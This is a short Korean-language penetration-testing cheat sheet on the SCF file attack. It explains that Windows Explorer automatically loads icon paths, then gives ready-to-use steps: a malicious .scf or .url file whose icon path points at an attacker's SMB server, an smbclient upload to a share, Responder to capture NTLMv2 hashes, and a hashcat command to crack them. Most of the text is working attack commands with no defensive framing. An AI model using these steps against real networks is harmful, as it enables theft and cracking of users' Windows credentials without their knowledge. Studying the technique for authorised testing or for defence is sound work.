# SCF File Attack 기본 개념
- `.scf` 파일: 아이콘 경로를 담고 있는 윈도우 설정 파일
- 윈도우 탐색기는 폴더에 `.scf` 파일이 있으면 자동으로 그 아이콘 경로를 열려고 함.
- 아이콘 경로가 공격자의 SMB 서버라면? > 자동으로 피해자가 공격자에게 인증 시도.
- 이 때 발생하는 NTLM 인증 정보를 공격자가 가로챈다.
# SCF File Attack
`.scf`파일 만들기
```bash
[Shell]
Command=2
IconFile=\\<attacker-IP>\%USERNAME%.icon
IconIndex=1
# 혹은
echo "[Shell]" > icon.scf
echo "Command=2" >> icon.scf
echo "IconFile=\\<attacker-IP>\%USERNAME%.icon" >> icon.scf
echo "IconIndex=1"
# 혹은
# icon.url
파일 확장자 = .url
[InternetShortcut]
URL=any
WorkingDirectory=any
IconFile=\\10.6.61.45\%USERNAME%.icon
IconIndex=1
```
공유 폴더에 `.scf` 혹은 `.url` 파일 업로드
```bash
smbclient //<IP>/share
put icon.scf
```
`Responder` 실행하고 기다리기
```bash
sudo responder -I tun0
```
NTLMv2 hash 얻으면 hashcat으로 크래킹 진행
```bash
# NTLMv2는 모드 5600번 사용
hashcat -m 5600 -a 0 <hash.txt> <wordlist.txt>
```